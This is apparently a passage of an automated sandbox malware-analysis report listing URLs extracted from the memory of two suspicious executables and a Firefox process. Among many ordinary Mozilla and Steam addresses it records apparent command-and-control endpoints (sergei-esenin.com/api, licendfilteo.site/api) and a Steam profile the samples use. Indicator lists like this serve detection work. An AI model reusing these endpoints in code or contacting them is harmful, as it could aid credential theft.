Source: firefox.exe, 0000001C.00000002.3213984029.000002682A900000.00000002.00000001.00040000.0000001F.sdmp String found in binary or memory: https://help.getpocket.com/article/1142-firefox-new-tab-recommendations-faq
Source: ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001177000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: file.exe, 00000000.00000003.2222017745.000000000069B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199513745.0000000000694000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2945838714.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2897844362.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883741777.0000000001105000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2958289959.0000000001109000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883909794.0000000001113000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883941944.0000000001106000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/en/
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881Value
Source: firefox.exe, 0000001C.00000002.3213984029.000002682A900000.00000002.00000001.00040000.0000001F.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881a
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/
Source: firefox.exe, 0000001C.00000002.3213984029.000002682A900000.00000002.00000001.00040000.0000001F.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/7
Source: firefox.exe, 0000001C.00000002.3275031797.0000026832108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/X
Source: firefox.exe, 0000001C.00000002.3216509308.000002682B62E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 0000001C.00000002.3216509308.000002682B664000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submitStructured
Source: firefox.exe, 0000001C.00000002.3271841943.0000026831F28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submits
Source: firefox.exe, 0000001C.00000002.3275406408.0000026832214000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: ee8d47a049.exe, 0000000C.00000003.2884028726.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883770636.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2897844362.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3035132023.0000000001155000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001155000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://licendfilteo.site:443/api
Source: firefox.exe, 0000001C.00000002.3275406408.0000026832214000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 0000001C.00000002.3275406408.0000026832214000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 0000001C.00000002.3275406408.0000026832214000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
Source: firefox.exe, 0000001C.00000002.3235554018.000002682E93A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 0000001C.00000002.3244804449.000002682FA2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/
Source: firefox.exe, 0000001C.00000002.3244804449.000002682FA2A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3235554018.000002682E903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3243296579.000002682F9D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3289963540.00002AA3DFA35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: firefox.exe, 0000001C.00000002.3289304414.000015D2F1003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.comZ
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com
Source: ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001177000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001177000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: firefox.exe, 0000001C.00000002.3220331573.000002682B820000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3222889062.000002682D989000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3216509308.000002682B6AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 0000001C.00000002.3222889062.000002682D989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 0000001C.00000002.3222889062.000002682D989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%sv
Source: firefox.exe, 0000001C.00000002.3222889062.000002682D989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 0000001C.00000002.3222889062.000002682D989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
Source: ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001177000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3201171185.000002681E1D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggestresource://activity-stream/lib/DefaultSites.sys.mj
Source: firefox.exe, 0000001C.00000002.3201171185.000002681E103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 0000001C.00000002.3288220208.0000080DC1204000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mozilla.org/
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mzl.la/3NS9KJd
Source: firefox.exe, 0000001C.00000002.3222889062.000002682D989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001177000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: firefox.exe, 0000001C.00000002.3222889062.000002682D989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001C.00000002.3222889062.000002682D989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
Source: firefox.exe, 0000001C.00000002.3213984029.000002682A900000.00000002.00000001.00040000.0000001F.sdmp String found in binary or memory: https://reactjs.org/docs/error-decoder.html?invariant=
Source: ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001177000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001177000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: firefox.exe, 0000001C.00000002.3271841943.0000026831F61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001177000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: firefox.exe, 0000001C.00000002.3201171185.000002681E103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 0000001C.00000003.3085509496.000002682E210000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/_beginObservingNewtabPingPrefs/
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.comnetwork.proxy.backup.socks_portbrowser.urlbar.suggest.topsiteschrome:
Source: ee8d47a049.exe, 0000000C.00000003.2883971948.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2958289959.0000000001109000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2975067077.0000000001109000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/
Source: ee8d47a049.exe, 0000000C.00000003.2993653031.0000000001110000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2897844362.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2958289959.0000000001109000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2975067077.0000000001109000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/4
Source: file.exe, 00000000.00000003.2291920296.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2310713522.00000000006A6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2285534089.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2310828294.00000000006AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/;
Source: file.exe, 00000000.00000003.2291920296.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2310713522.00000000006A6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2285534089.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2310828294.00000000006AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/Q
Source: file.exe, 00000000.00000003.2367688328.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2367763600.00000000006AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/S;.
Source: file.exe, 00000000.00000003.2222017745.000000000069B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/YPu
Source: file.exe, 00000000.00000003.2285534089.00000000006A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/a
Source: file.exe, 00000000.00000003.2208508823.000000000064F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2279712308.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883867156.00000000010D0000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.3085730532.0000000001109000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2993653031.0000000001110000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2945838714.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883770636.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2897844362.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2967817966.00000000057F1000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.3086208554.00000000057F1000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2967850289.00000000057F4000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2958718238.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2993750206.00000000057F1000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883971948.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2958289959.0000000001109000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2975067077.0000000001109000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/api
Source: file.exe, 00000000.00000003.2267291789.000000000069B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2267704300.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2267376515.00000000006A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2279712308.00000000006A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/api$
Source: ee8d47a049.exe, 0000000C.00000003.3086208554.00000000057F1000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2993750206.00000000057F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/api9
Source: file.exe, 00000000.00000003.2310781573.00000000006BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2285534089.00000000006BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2291920296.00000000006BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/api9V
Source: file.exe, 00000000.00000003.2291920296.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2284921931.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2285534089.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2279712308.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2284961748.00000000006A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apiBg==
Source: file.exe, 00000000.00000003.2310713522.00000000006A6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2310781573.00000000006B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apiBg==.
Source: ee8d47a049.exe, 0000000C.00000003.2945838714.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2958718238.00000000010C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apiEZ
Source: file.exe, 00000000.00000003.2367688328.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2367763600.00000000006AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apiR
Source: file.exe, 00000000.00000003.2367812607.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2310781573.00000000006BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2285534089.00000000006BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2291920296.00000000006BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apib
Source: file.exe, 00000000.00000003.2285003028.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2279864597.00000000006BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2284983681.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2284921931.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2367812607.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2310781573.00000000006BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2285534089.00000000006BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2284961748.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2291920296.00000000006BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apie
Source: ee8d47a049.exe, 0000000C.00000003.2958289959.0000000001109000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apim
Source: ee8d47a049.exe, 0000000C.00000003.2883867156.00000000010D0000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883770636.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883971948.00000000010D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apixo$
Source: file.exe, 00000000.00000003.2367812607.00000000006BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apiy
Source: file.exe, 00000000.00000003.2222017745.000000000069B000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2897844362.00000000010C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/t
Source: ee8d47a049.exe, 0000000C.00000003.2884028726.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2945838714.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883770636.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2897844362.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2967613756.00000000010B9000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2958718238.00000000010C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com:443/api
Source: ee8d47a049.exe, 0000000C.00000003.2897844362.00000000010C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com:443/apifiles/76561199724331900
Source: ee8d47a049.exe, 0000000C.00000003.2967613756.00000000010B9000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2958718238.00000000010C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com:443/apil
Source: ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001177000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svgwebcompat-reporter%40mozilla.org:1.5.1
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svgresource://gre/modules/TelemetryStorage.sys.mjs
Source: firefox.exe, 0000001C.00000002.3213984029.000002682A900000.00000002.00000001.00040000.0000001F.sdmp String found in binary or memory: https://snippets.mozilla.com/show/
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3271841943.0000026831F28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 0000001C.00000002.3216509308.000002682B603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 0000001C.00000002.3275031797.0000026832108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#
Source: firefox.exe, 0000001C.00000002.3275031797.0000026832108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#l
Source: firefox.exe, 0000001C.00000002.3216509308.000002682B603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3271841943.0000026831F28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/usergetValue/preffedBlockRegions
Source: firefox.exe, 0000001C.00000002.3243296579.000002682F962000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3213139863.000002682A803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3242551338.000002682F80B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-jscolor-mix(in
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3242551338.000002682F80B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001177000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
Source: ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001177000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001177000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001177000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: ee8d47a049.exe, 0000000C.00000003.2897844362.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883741777.0000000001105000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883941944.0000000001106000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.ca
Source: ee8d47a049.exe, 0000000E.00000003.3034649856.000000000114A000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000002.3052863545.000000000114A000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011CA000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com
Source: ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001177000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/
Source: ee8d47a049.exe, 0000000C.00000003.2883941944.0000000001106000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: ee8d47a049.exe, 0000000C.00000003.2883941944.0000000001106000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/discussions/
Source: ee8d47a049.exe, 0000000C.00000003.2883741777.0000000001105000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883909794.0000000001113000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034649856.000000000114A000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011CA000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011CA000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: ee8d47a049.exe, 0000000C.00000003.2883941944.0000000001106000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/market/
Source: file.exe, 00000000.00000003.2208311275.000000000069F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2222017745.000000000069B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199513745.0000000000694000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2993653031.0000000001110000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2945838714.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2897844362.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883741777.0000000001105000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2958289959.0000000001109000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2975067077.0000000001109000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883909794.0000000001113000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883941944.0000000001106000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/my/wishlist/
